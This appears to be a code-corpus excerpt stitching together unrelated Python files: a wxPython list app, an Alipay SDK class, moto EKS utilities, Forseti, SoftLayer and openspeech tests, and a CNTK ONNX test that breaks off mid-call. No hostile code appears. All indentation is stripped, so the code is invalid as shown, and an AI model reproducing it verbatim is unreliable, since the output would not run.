wx.ListCtrl.__init__(self, parent, ID, pos, size, style)
listmix.ListCtrlAutoWidthMixin.__init__(self)
class Appl(wx.Frame, listmix.ColumnSorterMixin):
def __init__(self, title='appl.py'):
super(Appl, self).__init__(None, title=title, size=(260, 180))
self.initUI()
self.initTimer()
self.Show(True)
def initUI(self):
self.InitMenubar()
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.total = wx.StaticText(self, -1, "Total:")
self.sizer.Add(self.total, 0, wx.EXPAND)
self.SetSizer(self.sizer)
self.list = AutoWidthListCtrl(self, -1, style=wx.LC_REPORT|wx.LC_SORT_ASCENDING)
self.sizer.AddSpacer(10)
self.sizer.Add(self.list, 0, wx.EXPAND)
self.list.InsertColumn(0, 'User ID', width=100)
self.list.InsertColumn(1, 'Name', width=100)
self.RetrieveData()
self.list.SetColumnWidth(0, wx.LIST_AUTOSIZE)
self.list.SetColumnWidth(1, wx.LIST_AUTOSIZE)
listmix.ColumnSorterMixin.__init__(self, 2)
def OnQuit(self, evt):
self.Close()
def GetListCtrl(self):
return self.list
def InitMenubar(self):
menubar = wx.MenuBar()
self.SetMenuBar(menubar)
fileMenu = wx.Menu()
menubar.Append(fileMenu, '&File')
fileItem = fileMenu.Append(wx.ID_EXIT, 'Quit', 'Quit application')
self.Bind(wx.EVT_MENU, self.OnQuit, fileItem)
def initTimer(self, interval=3000):
self.timer = wx.Timer(self)
self.timer.Start(interval)
self.Bind(wx.EVT_TIMER, self.RetrieveData)
def RetrieveData(self, evt=None):
if evt is not None:
self.list.DeleteAllItems()
print "cleared"
self.itemDataMap = {0:('vsc30140', 'gjb'), 1:('vsc30032', 'other')}
for key, user in self.itemDataMap.items():
idx = self.list.InsertStringItem(sys.maxint, user[0])
self.list.SetStringItem(idx, 1, user[1])
self.list.SetItemData(idx, key)
self.total.SetLabel('Total: {0}'.format(int(len(self.itemDataMap))))
def main():
app = wx.App()
Appl()
app.MainLoop()
if __name__ == '__main__':
main()
|
alipay/aop/api/domain/LogisticsAccountInfo.py | antopen/alipay-sdk-python-all | 213 | 11089416 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class LogisticsAccountInfo(object):
def __init__(self):
self._audit_desc = None
self._logistics_account_id = None
self._logistics_account_status = None
self._pid = None
@property
def audit_desc(self):
return self._audit_desc
@audit_desc.setter
def audit_desc(self, value):
self._audit_desc = value
@property
def logistics_account_id(self):
return self._logistics_account_id
@logistics_account_id.setter
def logistics_account_id(self, value):
self._logistics_account_id = value
@property
def logistics_account_status(self):
return self._logistics_account_status
@logistics_account_status.setter
def logistics_account_status(self, value):
self._logistics_account_status = value
@property
def pid(self):
return self._pid
@pid.setter
def pid(self, value):
self._pid = value
def to_alipay_dict(self):
params = dict()
if self.audit_desc:
if hasattr(self.audit_desc, 'to_alipay_dict'):
params['audit_desc'] = self.audit_desc.to_alipay_dict()
else:
params['audit_desc'] = self.audit_desc
if self.logistics_account_id:
if hasattr(self.logistics_account_id, 'to_alipay_dict'):
params['logistics_account_id'] = self.logistics_account_id.to_alipay_dict()
else:
params['logistics_account_id'] = self.logistics_account_id
if self.logistics_account_status:
if hasattr(self.logistics_account_status, 'to_alipay_dict'):
params['logistics_account_status'] = self.logistics_account_status.to_alipay_dict()
else:
params['logistics_account_status'] = self.logistics_account_status
if self.pid:
if hasattr(self.pid, 'to_alipay_dict'):
params['pid'] = self.pid.to_alipay_dict()
else:
params['pid'] = self.pid
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = LogisticsAccountInfo()
if 'audit_desc' in d:
o.audit_desc = d['audit_desc']
if 'logistics_account_id' in d:
o.logistics_account_id = d['logistics_account_id']
if 'logistics_account_status' in d:
o.logistics_account_status = d['logistics_account_status']
if 'pid' in d:
o.pid = d['pid']
return o
|
vilya/views/watching.py | mubashshirjamal/code | 1,582 | 11089426 | <reponame>mubashshirjamal/code
# -*- coding: utf-8 -*-
from vilya.libs.template import st
_q_exports = []
def _q_index(request):
user = request.user
if user:
watched_projects = user.watched_projects
return st('/watching.html', **locals())
return request.redirect("/hub/teams")
|
moto/eks/utils.py | orenmazor/moto | 5,460 | 11089427 | <filename>moto/eks/utils.py
import inspect
import re
from boto3 import Session
from moto.eks.exceptions import InvalidParameterException
def get_partition(region):
valid_matches = [
# (region prefix, aws partition)
("cn-", "aws-cn"),
("us-gov-", "aws-us-gov"),
("us-gov-iso-", "aws-iso"),
("us-gov-iso-b-", "aws-iso-b"),
]
for prefix, partition in valid_matches:
if region.startswith(prefix):
return partition
return "aws"
def method_name(use_parent=False):
"""
Returns the name of the method which called it from the stack in PascalCase.
If `use_parent` is True, returns the parent of the method which called it instead.
For example: False/default will return the name of the method calling it.
In a helper method, use True to return the name of the method which called the helper.
"""
return (
# stack()[0] is this method, stack()[1] is the method which called this one, etc
inspect.stack()[int(use_parent) + 1][0]
.f_code.co_name.replace("_", " ")
.title()
.replace(" ", "")
)
def validate_role_arn(arn):
valid_role_arn_format = re.compile(
"arn:(?P<partition>.+):iam::(?P<account_id>[0-9]{12}):role/.+"
)
match = valid_role_arn_format.match(arn)
valid_partition = match.group("partition") in Session().get_available_partitions()
if not all({arn, match, valid_partition}):
raise InvalidParameterException("Invalid Role Arn: '" + arn + "'")
|
tests/ut/python/parallel/test_comm_not_recompute.py | mindspore-ai/mindspore | 3,200 | 11089506 | # Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import mindspore.nn as nn
import mindspore as ms
from mindspore import Tensor, context, Parameter
from mindspore.common.api import _cell_graph_executor
from mindspore.ops import operations as P
from mindspore.common.initializer import initializer
from mindspore.context import _Context
from ....train_step_wrap import train_step_with_loss_warp
class MatMulCell(nn.Cell):
def __init__(self):
super(MatMulCell, self).__init__()
self.reshape = P.Reshape()
self.matmul0 = P.MatMul()
self.weight = Parameter(initializer("ones", [128, 64], ms.float32), name="weight")
self.relu = P.ReLU().shard(((1, 8),))
def construct(self, x):
x = self.matmul0(x, self.weight)
x = self.reshape(x, (32, 128))
x = self.relu(x)
return x
class DenseMutMulNet(nn.Cell):
def __init__(self):
super(DenseMutMulNet, self).__init__()
self.fc1 = nn.Dense(128, 768, activation='relu')
self.fc2 = nn.Dense(128, 768, activation='relu')
self.fc3 = nn.Dense(128, 768, activation='relu')
self.fc4 = nn.Dense(768, 768, activation='relu')
self.fc1.matmul.shard(((1, 1), (1, 8)))
self.fc2.matmul.shard(((1, 1), (1, 8)))
self.fc3.matmul.shard(((1, 1), (1, 8)))
self.relu4 = nn.ReLU()
self.relu5 = nn.ReLU()
self.transpose = P.Transpose()
self.matmul1 = P.MatMul()
self.matmul2 = P.MatMul()
self.matmul_cell = MatMulCell()
self.fc1.recompute(mp_comm_recompute=False)
self.fc2.recompute(mp_comm_recompute=False)
self.fc3.recompute(mp_comm_recompute=False)
self.matmul_cell.recompute(mp_comm_recompute=False)
def construct(self, x):
x = self.matmul_cell(x)
q = self.fc1(x)
k = self.fc2(x)
v = self.fc3(x)
k = self.transpose(k, (1, 0))
c = self.relu4(self.matmul1(q, k))
s = self.relu5(self.matmul2(c, v))
s = self.fc4(s)
return s
def test_dmnet_train_step():
context.reset_auto_parallel_context()
_Context().set_backend_policy("vm")
context.set_context(mode=context.GRAPH_MODE)
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel", device_num=8)
input_ = Tensor(np.ones([64, 128]).astype(np.float32) * 0.01)
label = Tensor(np.zeros([32, 768]).astype(np.float32))
net = train_step_with_loss_warp(DenseMutMulNet())
net.set_auto_parallel()
net.set_train()
_cell_graph_executor.compile(net, input_, label)
_Context().set_backend_policy("ge")
|
tests/test_lr_scheduler.py | CanYouImagine/openspeech | 207 | 11089507 | import unittest
import torch
import matplotlib.pyplot as plt
from torch import optim
from openspeech.optim.optimizer import Optimizer
from openspeech.utils import build_dummy_configs
from openspeech.optim.scheduler.warmup_scheduler import (
WarmupLRSchedulerConfigs,
WarmupLRScheduler,
)
from openspeech.optim.scheduler.reduce_lr_on_plateau_scheduler import (
ReduceLROnPlateauScheduler,
ReduceLROnPlateauConfigs,
)
from openspeech.optim.scheduler.transformer_lr_scheduler import (
TransformerLRScheduler,
TransformerLRSchedulerConfigs,
)
from openspeech.optim.scheduler.tri_stage_lr_scheduler import (
TriStageLRScheduler,
TriStageLRSchedulerConfigs,
)
from openspeech.optim.scheduler.warmup_reduce_lr_on_plateau_scheduler import (
WarmupReduceLROnPlateauConfigs,
WarmupReduceLROnPlateauScheduler,
)
class TestLRScheduler(unittest.TestCase):
def test_warmup_lr_scheduler(self):
configs = build_dummy_configs(scheduler_configs=WarmupLRSchedulerConfigs())
lr_histories = list()
total_steps = 15000
model = [torch.nn.Parameter(torch.randn(2, 2, requires_grad=True))]
optimizer = optim.Adam(model, lr=1e-04)
scheduler = WarmupLRScheduler(optimizer, configs)
optimizer = Optimizer(
optim=optimizer,
scheduler=scheduler,
scheduler_period=total_steps,
max_grad_norm=0.0,
)
for timestep in range(total_steps):
optimizer.step(model)
lr_histories.append(optimizer.get_lr())
plt.title('WarmupLRScheduler')
plt.plot(lr_histories, label='lr', color='#FF6C38', linewidth=2)
plt.legend()
plt.grid(True)
plt.xlabel('timestep', fontsize='large')
plt.ylabel('lr', fontsize='large')
plt.savefig('WarmupLRScheduler.png')
def test_reduce_lr_on_plateau_scheduler(self):
configs = build_dummy_configs(scheduler_configs=ReduceLROnPlateauConfigs())
lr_histories = list()
total_steps = 15000
model = [torch.nn.Parameter(torch.randn(2, 2, requires_grad=True))]
optimizer = optim.Adam(model, lr=1e-04)
scheduler = ReduceLROnPlateauScheduler(optimizer, configs)
optimizer = Optimizer(
optim=optimizer,
scheduler=scheduler,
scheduler_period=total_steps,
max_grad_norm=0.0,
)
for timestep in range(total_steps):
optimizer.step(model)
lr_histories.append(optimizer.get_lr())
plt.title('ReduceLROnPlateauScheduler')
plt.plot(lr_histories, label='lr', color='#FF6C38', linewidth=2)
plt.legend()
plt.grid(True)
plt.xlabel('timestep', fontsize='large')
plt.ylabel('lr', fontsize='large')
plt.savefig('ReduceLROnPlateauScheduler.png')
def test_transformer_lr_scheduler(self):
configs = build_dummy_configs(scheduler_configs=TransformerLRSchedulerConfigs())
lr_histories = list()
total_steps = 15000
model = [torch.nn.Parameter(torch.randn(2, 2, requires_grad=True))]
optimizer = optim.Adam(model, lr=1e-04)
scheduler = TransformerLRScheduler(optimizer, configs)
optimizer = Optimizer(
optim=optimizer,
scheduler=scheduler,
scheduler_period=total_steps,
max_grad_norm=0.0,
)
for timestep in range(total_steps):
optimizer.step(model)
lr_histories.append(optimizer.get_lr())
plt.title('TransformerLRScheduler')
plt.plot(lr_histories, label='lr', color='#FF6C38', linewidth=2)
plt.legend()
plt.grid(True)
plt.xlabel('timestep', fontsize='large')
plt.ylabel('lr', fontsize='large')
plt.savefig('TransformerLRScheduler.png')
def test_tri_stage_scheduler(self):
configs = build_dummy_configs(scheduler_configs=TriStageLRSchedulerConfigs())
lr_histories = list()
total_steps = 15000
model = [torch.nn.Parameter(torch.randn(2, 2, requires_grad=True))]
optimizer = optim.Adam(model, lr=1e-04)
scheduler = TriStageLRScheduler(optimizer, configs)
optimizer = Optimizer(
optim=optimizer,
scheduler=scheduler,
scheduler_period=total_steps,
max_grad_norm=0.0,
)
for timestep in range(total_steps):
optimizer.step(model)
lr_histories.append(optimizer.get_lr())
plt.title('TransformerLRScheduler')
plt.plot(lr_histories, label='lr', color='#FF6C38', linewidth=2)
plt.legend()
plt.grid(True)
plt.xlabel('timestep', fontsize='large')
plt.ylabel('lr', fontsize='large')
plt.savefig('TransformerLRScheduler.png')
def test_warmup_reduce_lr_on_plateau_scheduler(self):
configs = build_dummy_configs(scheduler_configs=WarmupReduceLROnPlateauConfigs())
lr_histories = list()
total_steps = 15000
model = [torch.nn.Parameter(torch.randn(2, 2, requires_grad=True))]
optimizer = optim.Adam(model, lr=1e-04)
scheduler = WarmupReduceLROnPlateauScheduler(optimizer, configs)
optimizer = Optimizer(
optim=optimizer,
scheduler=scheduler,
scheduler_period=total_steps,
max_grad_norm=0.0,
)
for timestep in range(total_steps):
optimizer.step(model)
lr_histories.append(optimizer.get_lr())
plt.title('TransformerLRScheduler')
plt.plot(lr_histories, label='lr', color='#FF6C38', linewidth=2)
plt.legend()
plt.grid(True)
plt.xlabel('timestep', fontsize='large')
plt.ylabel('lr', fontsize='large')
plt.savefig('TransformerLRScheduler.png')
if __name__ == '__main__':
unittest.main()
|
tests/decoration_tests.py | dvzrv/softlayer-python | 126 | 11089509 | """
SoftLayer.tests.decoration_tests
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:license: MIT, see LICENSE for more details.
"""
import logging
from unittest import mock as mock
from SoftLayer.decoration import retry
from SoftLayer import exceptions
from SoftLayer import testing
class TestDecoration(testing.TestCase):
def setUp(self):
super(TestDecoration, self).setUp()
self.patcher = mock.patch('SoftLayer.decoration.sleep')
self.patcher.return_value = False
self.patcher.start()
self.addCleanup(self.patcher.stop)
self.counter = 0
def test_no_retry_required(self):
@retry(exceptions.SoftLayerError, tries=4)
def succeeds():
self.counter += 1
return 'success'
r = succeeds()
self.assertEqual(r, 'success')
self.assertEqual(self.counter, 1)
@mock.patch('SoftLayer.decoration.randint')
def test_retries_once(self, _random):
_random.side_effect = [0, 0, 0, 0]
@retry(exceptions.SoftLayerError, tries=4, logger=logging.getLogger(__name__))
def fails_once():
self.counter += 1
if self.counter < 2:
raise exceptions.SoftLayerError('failed')
else:
return 'success'
with self.assertLogs(__name__, level='WARNING') as log:
r = fails_once()
self.assertEqual(log.output, ["WARNING:tests.decoration_tests:failed, Retrying in 5 seconds..."])
self.assertEqual(r, 'success')
self.assertEqual(self.counter, 2)
def test_limit_is_reached(self):
@retry(exceptions.SoftLayerError, tries=4)
def always_fails():
self.counter += 1
raise exceptions.SoftLayerError('failed!')
self.assertRaises(exceptions.SoftLayerError, always_fails)
self.assertEqual(self.counter, 4)
def test_multiple_exception_types(self):
@retry((exceptions.SoftLayerError, TypeError), tries=4)
def raise_multiple_exceptions():
self.counter += 1
if self.counter == 1:
raise exceptions.SoftLayerError('a retryable error')
elif self.counter == 2:
raise TypeError('another retryable error')
else:
return 'success'
r = raise_multiple_exceptions()
self.assertEqual(r, 'success')
self.assertEqual(self.counter, 3)
def test_unexpected_exception_does_not_retry(self):
@retry(exceptions.SoftLayerError, tries=4)
def raise_unexpected_error():
raise TypeError('unexpected error')
self.assertRaises(TypeError, raise_unexpected_error)
|
IronManFly/storage/db/utils.py | leepand/IronManFly | 599 | 11089524 | import os
import json
import base64
def profile_path(profile_id, profile):
"""Create full path to given provide for the current user."""
user = os.path.expanduser("~")
return os.path.join(user, profile_id + profile)
def load_profile(f):
return json.loads(base64.decodestring(open(f, 'rb').read()).encode('utf-8'))
def load_from_json(file_path):
"""Load the stored data from json, and return as a dict."""
if os.path.exists(file_path):
raw_data = open(file_path, 'rb').read()
return json.loads(base64.decodestring(raw_data).decode('utf-8'))
def dump_to_json(file_path, data):
with open(file_path, 'wb') as f:
json_data = json.dumps(data)
try:
f.write(base64.encodestring(json_data))
except:
f.write(base64.encodestring(bytes(json_data, 'utf-8')))
|
google/cloud/forseti/common/gcp_type/instance_group_manager.py | aarontp/forseti-security | 921 | 11089526 | <filename>google/cloud/forseti/common/gcp_type/instance_group_manager.py
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A Compute InstanceGroupManager.
See:
https://cloud.google.com/compute/docs/reference/latest/instanceGroupManagers
"""
from builtins import object
import json
# pylint: disable=too-many-instance-attributes
class InstanceGroupManager(object):
"""Represents InstanceGroupManager resource."""
def __init__(self, **kwargs):
"""InstanceGroupManager resource.
Args:
**kwargs (dict): Keyworded variable args.
"""
self.id = kwargs.get('id')
self.base_instance_name = kwargs.get('base_instance_name')
self.creation_timestamp = kwargs.get('creation_timestamp')
self.description = kwargs.get('description')
self.current_actions = kwargs.get('current_actions')
self.instance_group = kwargs.get('instance_group')
self.instance_template = kwargs.get('instance_template')
self.name = kwargs.get('name')
self.named_ports = kwargs.get('named_ports')
self.project_id = kwargs.get('project_id')
self.region = kwargs.get('region')
self.resource_id = kwargs.get('id')
self.target_pools = kwargs.get('target_pools')
self.target_size = kwargs.get('target_size')
self.zone = kwargs.get('zone')
self._json = kwargs.get('raw_instance_group_manager')
@classmethod
def from_dict(cls, igm, project_id=None):
"""Creates an InstanceGroupManager from an instance group manager dict.
Args:
igm (dict): An instance group manager resource dict.
project_id (str): A project id for the resource.
Returns:
InstanceGroupManager: A new InstanceGroupManager object.
"""
kwargs = {'project_id': project_id,
'id': igm.get('id'),
'creation_timestamp': igm.get('creationTimestamp'),
'name': igm.get('name'),
'description': igm.get('description'),
'base_instance_name': igm.get('baseInstanceName'),
'current_actions': igm.get('currentActions', {}),
'instance_group': igm.get('instanceGroup'),
'instance_template': igm.get('instanceTemplate'),
'named_ports': igm.get('namedPorts', []),
'region': igm.get('region'),
'target_pools': igm.get('targetPools', []),
'target_size': igm.get('targetSize'),
'zone': igm.get('zone'),
'raw_instance_group_manager': json.dumps(
igm, sort_keys=True)}
return cls(**kwargs)
@staticmethod
def from_json(json_string, project_id=None):
"""Creates an InstanceGroupManager from a JSON string.
Args:
json_string (str): A json string representing the instance group
manager.
project_id (str): A project id for the resource.
Returns:
InstanceGroupManager: A new InstanceGroupManager object.
"""
igm = json.loads(json_string)
return InstanceGroupManager.from_dict(igm, project_id)
def _create_json_str(self):
"""Creates a json string based on the object attributes.
Returns:
str: json str.
"""
resource_dict = {
'id': self.id,
'creationTimestamp': self.creation_timestamp,
'name': self.name,
'description': self.description,
'baseInstanceName': self.base_instance_name,
'currentActions': self.current_actions,
'instanceGroup': self.instance_group,
'instanceTemplate': self.instance_template,
'namedPorts': self.named_ports,
'targetPools': self.target_pools,
'targetSize': self.target_size,
'zone': self.zone}
# Strip out empty values
resource_dict = dict((k, v) for k, v in
list(resource_dict.items()) if v)
return json.dumps(resource_dict, sort_keys=True)
@property
def json(self):
"""Returns the json string representation of the resource.
Returns:
str: json str.
"""
if not self._json:
self._json = self._create_json_str()
return self._json
# TODO: Create utility methods to reconstruct full region, target, and
# self link.
|
office365/sharepoint/changes/change_field.py | wreiner/Office365-REST-Python-Client | 544 | 11089529 | from office365.sharepoint.changes.change import Change
class ChangeField(Change):
@property
def field_id(self):
return self.properties.get("FieldId", None)
|
bindings/python/cntk/tests/onnx_model_test.py | rohankumardubey/CNTK | 17,702 | 11089530 | <filename>bindings/python/cntk/tests/onnx_model_test.py
# Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE.md file in the project root
# for full license information.
# ==============================================================================
import cntk as C
import numpy as np
import pytest
import os
import re
import shutil
import time
import tempfile
onnx = pytest.importorskip("onnx")
from onnx import numpy_helper
from .onnx_verify_helper import generate_sequence_data, generate_sequential_data, generate_sparse_data, verify_results_with_onnxruntime, generate_sparse_data_non_seq
from .onnx_test_helper import find_onnx_value_info_proto_with_matching_name, save_cntk_data_as_onnx_tensor, save_test_data, save_onnx_model_with_validation_data
from .onnx_op_test import verify_sequence_model
# To test models locally, create folder 'onnx_models' and put in model folders.
# For example.
# .
# +-- onnx_models # models stored in 'model.onnx' onnx format.
# | +-- model1
# | | +-- model.onnx
# | | +-- test_data_set_0
# | | | +-- input_0.pb
# | | | +-- input_1.pb
# | | | +-- output_0.pb
# | | +-- test_data_set_1
# | | | +-- input_0.pb
# | | | +-- input_1.pb
# | | | +-- output_0.pb
# | +-- model2
# ...
# +-- PretrainedModelsV2 # models stored in '.model' CNTKv2 format.
# | +-- model1.model
# | +-- model2.model
# ...
def get_base_dir(base_dir):
return base_dir if not 'CNTK_EXTERNAL_TESTDATA_SOURCE_DIRECTORY' in os.environ else os.path.join(os.environ['CNTK_EXTERNAL_TESTDATA_SOURCE_DIRECTORY'], base_dir)
onnx_base_dir = get_base_dir('onnx_models')
onnx_model_names = [dir for dir in os.listdir(onnx_base_dir)
if os.path.isdir(os.path.join(onnx_base_dir, dir)) and os.path.exists(os.path.join(onnx_base_dir, dir, 'model.onnx'))] if os.path.exists(onnx_base_dir) else []
cntk_base_dir = get_base_dir('PretrainedModelsV2')
cntk_model_names = [dir for dir in os.listdir(cntk_base_dir)
if os.path.isfile(os.path.join(cntk_base_dir, dir)) and dir.rfind('.model') + len('.model') == len(dir)] if os.path.exists(cntk_base_dir) else []
input_filename_pattern = re.compile('input_[0-9]+.pb')
output_filename_pattern = re.compile('output_[0-9]+.pb')
skip_model_names = [
# Convolution Nan issue on Linux.
'shufflenet',
# Tests from onnx backend tests that currently fails.
'test_constant',
'test_edge_pad',
'test_gru_defaults',
'test_gru_seq_length',
'test_gru_with_initial_bias',
'test_lstm_defaults',
'test_lstm_with_initial_bias',
'test_lstm_with_peepholes',
'test_reduce_log_sum',
'test_reduce_log_sum_asc_axes',
'test_reduce_log_sum_default',
'test_reduce_log_sum_desc_axes',
'test_reshape_extended_dims',
'test_reshape_negative_dim',
'test_reshape_one_dim',
'test_reshape_reduced_dims',
'test_reshape_reordered_dims',
'test_rnn_seq_length',
'test_shape',
'test_shape_example',
'test_simple_rnn_defaults',
'test_simple_rnn_with_initial_bias',
'test_size',
'test_size_example',
'test_slice_end_out_of_bounds',
'test_slice_start_out_of_bounds',
'test_split_equal_parts_1d',
'test_split_equal_parts_2d',
'test_split_equal_parts_default_axis',
'test_split_variable_parts_1d',
'test_split_variable_parts_2d',
'test_split_variable_parts_default_axis',
'test_sum_one_input',
'test_thresholdedrelu',
'test_thresholdedrelu_default',
'test_thresholdedrelu_example',
'test_tile',
'test_tile_precomputed',
'test_top_k',
'test_transpose_default',
'test_upsample_nearest',
]
skip_round_trip_model_names = [
# Convolution Nan issue on Linux.
'shufflenet',
# Tests from onnx backend tests that currently fails.
'test_constant',
'test_edge_pad',
'test_gru_defaults',
'test_gru_seq_length',
'test_gru_with_initial_bias',
'test_lstm_defaults',
'test_lstm_with_initial_bias',
'test_lstm_with_peepholes',
'test_reduce_log_sum',
'test_reduce_log_sum_asc_axes',
'test_reduce_log_sum_default',
'test_reduce_log_sum_desc_axes',
'test_reshape_extended_dims',
'test_reshape_negative_dim',
'test_reshape_one_dim',
'test_reshape_reduced_dims',
'test_reshape_reordered_dims',
'test_rnn_seq_length',
'test_shape',
'test_shape_example',
'test_simple_rnn_defaults',
'test_simple_rnn_with_initial_bias',
'test_size',
'test_size_example',
'test_slice',
'test_slice_default_axes',
'test_slice_end_out_of_bounds',
'test_slice_start_out_of_bounds',
'test_split_equal_parts_1d',
'test_split_equal_parts_2d',
'test_split_equal_parts_default_axis',
'test_split_variable_parts_1d',
'test_split_variable_parts_2d',
'test_split_variable_parts_default_axis',
'test_sum_one_input',
'test_thresholdedrelu',
'test_thresholdedrelu_default',
'test_thresholdedrelu_example',
'test_tile',
'test_tile_precomputed',
'test_top_k',
'test_transpose_default',
'test_upsample_nearest',
# Lack proper support for ONNX ConvTranspose output_padding attribute.
'test_convtranspose_kernel_shape',
'test_convtranspose_output_shape',
'test_convtranspose_pad',
'test_convtranspose_with_kernel',
]
skip_cntk_model_names = []
@pytest.mark.parametrize('model_name, round_trip',
[(model_name, round_trip) for model_name in onnx_model_names for round_trip in [False, True]],
ids=['round_trip_' + model_name if round_trip else model_name for model_name in onnx_model_names for round_trip in [False, True]])
def test_onnx_model(model_name, round_trip):
if model_name in skip_model_names and not round_trip:
pytest.skip('Skip onnx model test. ')
if model_name in skip_round_trip_model_names and round_trip:
pytest.skip('Skip onnx model round trip test. ')
model_dir = os.path.join(onnx_base_dir, model_name)
model = C.Function.load(os.path.join(model_dir, 'model.onnx'), format=C.ModelFormat.ONNX)
if round_trip:
resave_model_path = 'model_resave.onnx'
model.save(resave_model_path, format=C.ModelFormat.ONNX)
model = C.Function.load(resave_model_path, format=C.ModelFormat.ONNX)
data_dirs = [os.path.join(model_dir, dir) for dir in os.listdir(model_dir)
if os.path.isdir(os.path.join(model_dir, dir))]
for data_dir in data_dirs:
inputs = []
ref_outputs = []
tensor = onnx.TensorProto()
input_filenames = [filename for filename in os.listdir(data_dir) if input_filename_pattern.match(filename)]
input_files_sorted = [os.path.join(data_dir, 'input_{:d}.pb'.format(i))
for i in range(len(input_filenames))]
output_filenames = [filename for filename in os.listdir(data_dir) if output_filename_pattern.match(filename)]
output_files_sorted = [os.path.join(data_dir, 'output_{:d}.pb'.format(i))
for i in range(len(output_filenames))]
for input_file in input_files_sorted:
with open(input_file, 'rb') as f:
tensor.ParseFromString(f.read())
inputs.append(numpy_helper.to_array(tensor))
for output_file in output_files_sorted:
with open(output_file, 'rb') as f:
tensor.ParseFromString(f.read())
ref_outputs.append(numpy_helper.to_array(tensor))
cntk_input = {model.arguments[i]:inputs[i] for i in range(len(inputs))}
cntk_res = [model.eval(cntk_input)]
if ref_outputs[0].dtype == np.bool:
cntk_res = [cntk_res[0].astype("bool")]
outputs = list(cntk_res)
np.testing.assert_equal(len(ref_outputs), len(outputs))
for i in range(len(outputs)):
np.testing.assert_equal(ref_outputs[i].dtype, outputs[i].dtype)
np.testing.assert_allclose(
ref_outputs[i],
outputs[i],
rtol=1e-3,
atol=1e-4)
# Helper for exporting test data.
model_file = 'model.onnx'
data_dir = 'test_data_set_0'
def SaveData(test_data_dir, prefix, onnx_variables, variables, data_list, names, batch_size=1):
if isinstance(data_list, np.ndarray):
data_list = [data_list]
for (i, d), v, n in zip(enumerate(data_list), variables, names):
onnx_value_info_proto = find_onnx_value_info_proto_with_matching_name(onnx_variables, n, onnx_variables[0])
save_cntk_data_as_onnx_tensor(os.path.join(test_data_dir, '{0}_{1}.pb'.format(prefix, i)), v, d, onnx_value_info_proto)
def Save(dir, func, inputs, outputs, batch_size=1, use_external_files_to_store_parameters = False):
if not os.path.exists(dir):
os.makedirs(dir)
model_file_path = os.path.join(dir, model_file)
func.save(model_file_path, C.ModelFormat.ONNX, use_external_files_to_store_parameters = use_external_files_to_store_parameters)
onnx_model = onnx.load(model_file_path)
onnx_model_description = onnx_model.graph.doc_string
uid_name_map = dict(tuple(x[3:-3].split(', ')) for x in re.findall(r'<<<[^>]*>>>', onnx_model_description)[1:])
# input names are mapped from uid to names (requested by skype team)
input_names = [x.uid if not x.name else x.name for x in func.arguments]
# handle block outputs
output_names = []
block_uid_count = {}
# when block are exported as a single onnx node, the onnx node output takes name from block node output.
# when block are exported by exporting nodes within that block, the onnx node output takes name from inner node output.
# the cntk node that provides the name will have its uid stored in the uid_name_map.
# this function tries to find the deepest inner output node whose uid is in uid_name_map.
def find_deepest_inner_block_output(output):
# might be a placeholder
if not output.is_output:
return False, output
if output.owner and output.owner.is_block:
block_uid_count[output.owner.uid] = block_uid_count[output.owner.uid] + 1 if output.owner.uid in block_uid_count else 0
found, inner_output = find_deepest_inner_block_output(output.owner.block_root.outputs[block_uid_count[output.owner.uid]])
if found:
return True, inner_output
return output.uid in uid_name_map, output
for output in func.outputs:
_, output = find_deepest_inner_block_output(output)
output_names.append(uid_name_map[output.uid])
test_data_dir = os.path.join(dir, data_dir)
if not os.path.exists(test_data_dir):
os.makedirs(test_data_dir)
SaveData(test_data_dir, 'input', onnx_model.graph.input, func.arguments, inputs, input_names, batch_size)
SaveData(test_data_dir, 'output', onnx_model.graph.output, func.outputs, outputs, output_names, batch_size)
# Initialize tmp-directory for exporting cntk models
tmpdir = 'tmp_exported_models'
if os.path.isdir(tmpdir):
# os.mkdir might get called before shutil.rmtree complete. So rename the current tmpdir to avoid collision.
tmp = tempfile.mktemp(dir=os.path.dirname(tmpdir))
shutil.move(tmpdir, tmp)
shutil.rmtree(tmp)
os.mkdir(tmpdir)
# test_cntk_model will create exported onnx model with test data in the following tmp folder:
# .
# +-- tmp_exported_models # models exported in 'model.onnx' onnx format.
# | +-- test_model1
# | | +-- model.onnx
# | | +-- test_data_set_0
# | | | +-- input_0.pb
# | | | +-- input_1.pb
# | | | +-- output_0.pb
# | | +-- test_data_set_1
# | | | +-- input_0.pb
# | | | +-- input_1.pb
# | | | +-- output_0.pb
# | +-- test_model2
# ...
@pytest.mark.parametrize("use_external_files_to_store_parameters", (False, True))
@pytest.mark.parametrize('model_name',
[model_name for model_name in cntk_model_names],
ids=[model_name for model_name in cntk_model_names])
def test_cntk_model(model_name, use_external_files_to_store_parameters):
if model_name in skip_cntk_model_names:
pytest.skip('Skip cntk model test. ')
cntk_base_dir = get_base_dir('PretrainedModelsV2')
model_dir = os.path.join(cntk_base_dir, model_name)
model = C.Function.load(model_dir, format=C.ModelFormat.CNTKv2)
resave_model_dir = os.path.join(tmpdir, 'test_' + model_name)
if use_external_files_to_store_parameters:
resave_model_dir += "_ext"
resave_model_path = os.path.join(resave_model_dir, model_file)
np.random.seed(3)
input_shape = (1,) + model.arguments[0].shape
data_x = np.asarray(np.random.uniform(-1, 1, input_shape), dtype=np.float32)
data_y = model.eval({model.arguments[0]:data_x})
Save(resave_model_dir, model, data_x, data_y,
